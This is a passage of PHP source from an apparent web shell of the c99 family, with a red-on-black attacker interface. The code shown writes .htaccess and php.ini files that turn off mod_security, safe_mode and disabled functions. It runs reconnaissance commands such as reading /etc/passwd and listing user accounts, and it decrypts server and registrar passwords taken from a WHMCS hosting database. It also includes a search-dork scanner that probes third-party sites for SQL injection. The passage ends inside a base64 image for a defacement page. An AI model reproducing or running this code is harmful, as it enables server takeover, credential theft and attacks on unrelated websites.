  2338. $dirhtaccess = $_POST['htaccesssafemode'];
  2339. $phpininamelol = "php.ini";
  2340.  
  2341. if($_POST['omssubmit'])
  2342. {
  2343.  $fse=fopen("$dirphpini.htaccess","w");
  2344.  fwrite($fse,'<IfModule mod_security.c>
  2345.    Sec------Engine Off
  2346.    Sec------ScanPOST Off
  2347. </IfModule>');
  2348.  fclose($fse);
  2349. }
  2350.  
  2351. else if ($_POST['dsmsubmit'])
  2352. {
  2353.  $fse=fopen("$dirhtaccess$phpininamelol","w");
  2354.  fwrite($fse,'safe_mode=OFF
  2355. disable_functions=NONE');
  2356.  fclose($fse);
  2357. }
  2358. }  
  2359.  
  2360. elseif(isset($_GET['x']) && ($_GET['x'] == 'process'))
  2361. {  
  2362. ?>
  2363. <form action="?y=<?php echo $pwd; ?>&amp;x=process" method="post">
  2364.  
  2365. <?php
  2366.  
  2367. function processc99() {
  2368.  if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
  2369.  else {$handler = "tasklist";}
  2370.  $ret = myshellexec($handler);
  2371.  if (!$ret) {echo "Can't execute \"".$handler."\"!";}
  2372.  else
  2373.  {
  2374.   if (empty($processes_sort)) {$processes_sort = $sort_default;}
  2375.   $parsesort = parsesort($processes_sort);
  2376.   if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
  2377.   $k = $parsesort[0];
  2378.   $ret = htmlspecialchars($ret);
  2379.   if (!$win)
  2380.   {
  2381.    if ($pid)
  2382.    {
  2383.     if (is_null($sig)) {$sig = 9;}
  2384.     echo "Sending signal ".$sig." to #".$pid."... ";
  2385.     if (posix_kill($pid,$sig)) {echo "OK.";}
  2386.     else {echo "ERROR.";}
  2387.    }
  2388.    while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  2389.    $stack = explode("\n",$ret);
  2390.    $head = explode(" ",$stack[0]);
  2391.    unset($stack[0]);  
  2392.    $prcs = array();
  2393.    foreach ($stack as $line)
  2394.    {
  2395.     if (!empty($line))
  2396. {
  2397.  echo "<tr>";
  2398.      $line = explode(" ",$line);
  2399.      $line[10] = join(" ",array_slice($line,10));
  2400.      $line = array_slice($line,0,11);
  2401.      $prcs[] = $line;
  2402.      echo "</tr>";
  2403.     }
  2404.    }
  2405.   }
  2406.   else
  2407.   {
  2408.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2409.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2410.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2411.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2412.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2413.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2414.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2415.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2416.    while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
  2417.    while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
  2418.    while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
  2419.    $ret = convert_cyr_string($ret,"d","w");
  2420.    $stack = explode("\n",$ret);
  2421.    unset($stack[0],$stack[2]);
  2422.    $stack = array_values($stack);
  2423.    $head = explode("",$stack[0]);
  2424.    $head[1] = explode(" ",$head[1]);
  2425.    $head[1] = $head[1][0];
  2426.    $stack = array_slice($stack,1);
  2427.    unset($head[2]);
  2428.    $head = array_values($head);
  2429.    if ($k > count($head)) {$k = count($head)-1;}
  2430.    $prcs = array();
  2431.    foreach ($stack as $line)
  2432.    {
  2433.     if (!empty($line))
  2434.     {
  2435.      echo "<tr>";
  2436.      $line = explode("",$line);
  2437.      $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
  2438.      $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
  2439.      $prcs[] = $line;
  2440.      echo "</tr>";
  2441.     }
  2442.    }
  2443.   }
  2444.   $head[$k] = "<b>".$head[$k]."</b>".$y;
  2445.   $v = $processes_sort[0];
  2446.   if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
  2447.   $tab = array();
  2448.   $tab[] = $head;
  2449.   $tab = array_merge($tab,$prcs);
  2450.   echo "<TABLE height=1 cellSpacing=0 cellPadding=5 width=\"100%\" border=1>";
  2451.   foreach($tab as $i=>$k)
  2452.   {
  2453.    echo "<tr>";
  2454.    foreach($k as $j=>$v) {
  2455.    if ($win and $i > 0 and $j == 2) {
  2456.    $v = view_size($v);
  2457.    }
  2458.    
  2459.    echo "<td>".$v."</td>";}
  2460.    echo "</tr>";
  2461.   }
  2462.   echo "</table>";
  2463.  }
  2464. }
  2465.  
  2466. echo "<center><br><br>";
  2467.     if($win) {
  2468.     echo "<form method='post'>
  2469.     <select style='color:#FF0000;background-color:#000000' name='windowsprocess'>
  2470.     <option name='systeminfo'>System Info</option>
  2471.     <option name='active'>Active Connections</option>
  2472.     <option name='runningserv'>Running Services</option>
  2473.     <option name='useracc'>User Accounts</option>
  2474.     <option name='showcom'>Show Computers</option>
  2475.     <option name='arptab'>ARP Table</option>
  2476.     <option name='ipconf'>IP Configuration</option>
  2477.     </select>
  2478.     <input type='submit' style='color:#FF0000;background-color:#000000' name='submitwinprocess' value='View'>
  2479.     </form>
  2480.     ";
  2481.     } else {
  2482.     echo "<form method='post'>
  2483.     <select style='color:#FF0000;background-color:#000000' name='nonwindowsprocess'>
  2484.     <option name='processsta'>Process status</option>
  2485.     <option name='syslog'>Syslog</option>
  2486.     <option name='resolv'>Resolv</option>
  2487.     <option name='hosts'>Hosts</option>
  2488.     <option name='passwd'>Passwd</option>
  2489.     <option name='cpuinfo'>Cpuinfo</option>
  2490.     <option name='version'>Version</option>
  2491.     <option name='sbin'>Sbin</option>
  2492.     <option name='interrupts'>Interrupts</option>
  2493.     <option name='lsattr'>lsattr</option>
  2494.     <option name='uptime'>Uptime</option>
  2495.     <option name='fstab'>Fstab</option>
  2496.     <option name='hddspace'>HDD Space</option>
  2497.     </select>
  2498.     <input type='submit' style='color:#FF0000;background-color:#000000' name='submitnonwinprocess' value='View'>
  2499.     </form>
  2500.     ";
  2501.     }
  2502.    
  2503.     $windowsprocess = $_POST['windowsprocess'];
  2504.     $nonwindowsprocess = $_POST['nonwindowsprocess'];
  2505.    
  2506.     if ($windowsprocess=="System Info") $winruncom = "systeminfo";
  2507.     if ($windowsprocess=="Active Connections") $winruncom = "netstat -an";
  2508.     if ($windowsprocess=="Running Services") $winruncom = "net start";
  2509.     if ($windowsprocess=="User Accounts") $winruncom = "net user";
  2510.     if ($windowsprocess=="Show Computers") $winruncom = "net view";
  2511.     if ($windowsprocess=="ARP Table") $winruncom = "arp -a";
  2512.     if ($windowsprocess=="IP Configuration") $winruncom = "ipconfig /all";
  2513.     if ($nonwindowsprocess=="Process status") $systeminfo = "ps aux";
  2514.     if ($nonwindowsprocess=="Syslog") $winruncom = "cat  /etc/syslog.conf";
  2515.     if ($nonwindowsprocess=="Resolv") $winruncom = "cat  /etc/resolv.conf";
  2516.     if ($nonwindowsprocess=="Hosts") $winruncom = "cat /etc/hosts";
  2517.     if ($nonwindowsprocess=="Passwd") $winruncom = "cat /etc/passwd";
  2518.     if ($nonwindowsprocess=="Cpuinfo") $winruncom = "cat /proc/cpuinfo";
  2519.     if ($nonwindowsprocess=="Version") $winruncom = "cat /proc/version";
  2520.     if ($nonwindowsprocess=="Sbin") $winruncom = "ls -al /usr/sbin";
  2521.     if ($nonwindowsprocess=="Interrupts") $winruncom = "cat /proc/interrupts";
  2522.     if ($nonwindowsprocess=="lsattr") $winruncom = "lsattr -va";
  2523.     if ($nonwindowsprocess=="Uptime") $winruncom = "uptime";
  2524.     if ($nonwindowsprocess=="Fstab") $winruncom = "cat /etc/fstab";
  2525.     if ($nonwindowsprocess=="HDD Space") $winruncom = "df -h";
  2526.    
  2527.  
  2528.     if (isset($winruncom)) {
  2529.     echo "<table class='cmdbox'>
  2530.     <tbody><tr>
  2531.     <td colspan='2'>
  2532.     <textarea class='output' name='content'>".exe($winruncom)."</textarea>
  2533.     </td></tr></table></center>";
  2534.     }
  2535.    
  2536.     if (isset($systeminfo)) {
  2537.         echo "<br><br>";
  2538.         processc99();
  2539.     }
  2540.  
  2541. }
  2542.  
  2543. elseif(isset($_GET['x']) && ($_GET['x'] == 'whmcs'))
  2544. {  
  2545. ?>
  2546. <form action="?y=<?php echo $pwd; ?>&amp;x=whmcs" method="post">
  2547.  
  2548. <?php
  2549.  
  2550. function decrypt ($string,$cc_encryption_hash)
  2551. {
  2552.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  2553.     $hash_key = _hash ($key);
  2554.     $hash_length = strlen ($hash_key);
  2555.     $string = base64_decode ($string);
  2556.     $tmp_iv = substr ($string, 0, $hash_length);
  2557.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  2558.     $iv = $out = '';
  2559.     $c = 0;
  2560.     while ($c < $hash_length)
  2561.     {
  2562.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  2563.         ++$c;
  2564.     }
  2565.     $key = $iv;
  2566.     $c = 0;
  2567.     while ($c < strlen ($string))
  2568.     {
  2569.         if (($c != 0 AND $c % $hash_length == 0))
  2570.         {
  2571.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  2572.         }
  2573.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  2574.         ++$c;
  2575.     }
  2576.     return $out;
  2577. }
  2578.  
  2579. function _hash ($string)
  2580. {
  2581.     if (function_exists ('sha1'))
  2582.     {
  2583.         $hash = sha1 ($string);
  2584.     }
  2585.     else
  2586.     {
  2587.         $hash = md5 ($string);
  2588.     }
  2589.     $out = '';
  2590.     $c = 0;
  2591.     while ($c < strlen ($hash))
  2592.     {
  2593.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  2594.         $c += 2;
  2595.     }
  2596.     return $out;
  2597. }
  2598.  
  2599. echo "<hr>
  2600. <br>
  2601. <center>
  2602. <br>
  2603.  
  2604. <FORM action=''  method='post'>
  2605. <input type='hidden' name='form_action' value='2'>
  2606. <br>
  2607. <table border=1>
  2608. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_host' value='localhost'></td></tr>
  2609. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_username' value=''></td></tr>
  2610. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_password' value=''></td></tr>
  2611. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:#000000' size='30' name='db_name' value=''></td></tr>
  2612. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:#000000' type='text' size='30' name='cc_encryption_hash' value=''></td></tr>
  2613. </table>
  2614. <br>
  2615. <INPUT class=submit type='submit' style='color:#FF0000;background-color:#000000' value='Submit' name='Submit'>
  2616. </FORM>
  2617. </center>
  2618. <hr>";
  2619.  
  2620.  if($_POST['form_action'] == 2 )
  2621.  {
  2622.  //include($file);
  2623.  $db_host=($_POST['db_host']);
  2624.  $db_username=($_POST['db_username']);
  2625.  $db_password=($_POST['db_password']);
  2626.  $db_name=($_POST['db_name']);
  2627.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  2628.  
  2629.  
  2630.  
  2631.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2632.         mysql_select_db($db_name,$link) ;
  2633. $query = mysql_query("SELECT * FROM tblservers");
  2634. while($v = mysql_fetch_array($query)) {
  2635. $ipaddress = $v['ipaddress'];
  2636. $username = $v['username'];
  2637. $type = $v['type'];
  2638. $active = $v['active'];
  2639. $hostname = $v['hostname'];
  2640. echo("<center><table border='1'>");
  2641. $password = decrypt ($v['password'], $cc_encryption_hash);
  2642. echo("<tr><td>Type</td><td>$type</td></tr>");
  2643. echo("<tr><td>Active</td><td>$active</td></tr>");
  2644. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  2645. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  2646. echo("<tr><td>Username</td><td>$username</td></tr>");
  2647. echo("<tr><td>Password</td><td>$password</td></tr>");
  2648.  
  2649. echo "</table><br><br></center>";
  2650. }
  2651.  
  2652.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  2653.         mysql_select_db($db_name,$link) ;
  2654. $query = mysql_query("SELECT * FROM tblregistrars");
  2655. echo("<center>Domain Reseller <br><table border='1'>");
  2656. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  2657. while($v = mysql_fetch_array($query)) {
  2658. $registrar     = $v['registrar'];
  2659. $setting = $v['setting'];
  2660. $value = decrypt ($v['value'], $cc_encryption_hash);
  2661. if ($value=="") {
  2662. $value=0;
  2663. }
  2664. $password = decrypt ($v['password'], $cc_encryption_hash);
  2665. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  2666. }
  2667. }
  2668. }
  2669. elseif(isset($_GET['x']) && ($_GET['x'] == 'sqli-scanner'))
  2670. {  
  2671. ?>
  2672. <form action="?y=<?php echo $pwd; ?>&amp;x=sqli-scanner" method="post">
  2673.  
  2674. <?php
  2675.  
  2676. echo '<br><br><center><form method="post" action=""><font color="red">Dork :</font> <input type="text" value="" name="dork" style="color:#FF0000;background-color:#000000" size="20"/><input type="submit" style="color:#FF0000;background-color:#000000" name="scan" value="Scan"></form></center>';
  2677.  
  2678. ob_start();
  2679. set_time_limit(0);
  2680.  
  2681. if (isset($_POST['scan'])) {
  2682.  
  2683. $browser = $_SERVER['HTTP_USER_AGENT'];
  2684.  
  2685. $first = "startgoogle.startpagina.nl/index.php?q=";
  2686. $sec = "&start=";
  2687. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  2688.  
  2689. for($id=0 ; $id<=30; $id++){
  2690. $page=$id*10;
  2691. $dork=urlencode($_POST['dork']);
  2692. $url = $first.$dork.$sec.$page;
  2693.  
  2694. $curl = curl_init($url);
  2695. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2696. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  2697. $result = curl_exec($curl);
  2698. curl_close($curl);
  2699.  
  2700. preg_match_all($reg,$result,$matches);
  2701. }
  2702. foreach($matches[1] as $site){
  2703.  
  2704. $url = preg_replace("/=/", "='", $site);
  2705. $curl=curl_init();
  2706. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  2707. curl_setopt($curl,CURLOPT_URL,$url);
  2708. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  2709. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  2710. $GET=curl_exec($curl);
  2711. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row()|SELECT *
  2712.  
  2713. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  2714. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font style="color:#FF0000"> &#60;-- SQLI Vuln
  2715.  
  2716. Found..</font></b></center>';
  2717. ob_flush();flush();
  2718. }else{
  2719. echo '<center><font style="color:#FFFFFF"><b>'.$url.'</b></font><font style="color:#0FFF16"> &#60;-- Not Vuln</font></center>';
  2720. ob_flush();flush();
  2721. }
  2722.  
  2723. ob_flush();flush();
  2724. }
  2725. ob_flush();flush();
  2726. }
  2727. ob_flush();flush();
  2728. }
  2729.  
  2730. elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){  ?>
  2731. <form action="?y=<?php echo $pwd; ?>&amp;x=zone-h" method="post">
  2732. <br><br><? echo '<p style="text-align: center;"> <img alt="" src="data:image/gif;base64,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